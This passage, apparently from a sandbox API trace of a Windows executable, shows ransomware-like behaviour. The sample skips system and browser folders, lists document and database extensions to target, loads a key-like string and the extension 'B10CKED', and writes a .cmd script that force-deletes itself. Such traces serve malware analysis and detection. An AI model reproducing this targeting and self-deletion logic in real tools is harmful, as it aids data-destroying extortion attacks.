dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 
[0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 
[0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0174.976] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0174.976] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0174.976] LockResource (hResData=0x516f58) returned 0x516f58 [0174.976] FreeResource (hResData=0x516f58) returned 0 [0174.976] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.976] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.976] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.976] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.976] FreeResource (hResData=0x50d64c) returned 0 [0174.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] GetCurrentThreadId () returned 0x728 [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0174.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0174.976] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0174.976] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0174.976] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0174.977] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0174.977] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0174.977] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0174.977] CharLowerBuffW (in: 
lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, 
lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xde8) returned 0xb8 [0175.001] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0175.001] ResumeThread (hThread=0xb8) returned 0x1 [0175.001] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0175.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0175.340] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0175.340] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0175.340] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0175.340] LockResource (hResData=0x5187d4) returned 0x5187d4 [0175.340] FreeResource (hResData=0x5187d4) returned 0 [0175.340] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0175.340] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0175.340] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0175.340] LockResource (hResData=0x50d64c) returned 0x50d64c [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0175.340] FreeResource (hResData=0x50d64c) returned 0 [0175.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0175.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0175.340] GetCurrentThreadId () returned 0x728 [0175.340] GetCurrentThreadId () returned 0x728 [0175.340] GetCurrentThreadId () returned 0x728 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0175.340] GetTickCount () returned 0x32f68 [0175.340] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=23212948936) returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="C畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="b畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="j畔﮴\x12\x1c翻") returned 1 [0175.340] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="y畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="0畔﮴\x12\x1c翻") returned 1 [0175.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="9畔﮴\x12\x1c翻") returned 1 [0175.340] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0175.341] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0175.341] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe") returned 0x30 [0175.341] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0175.341] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0175.341] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0175.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q 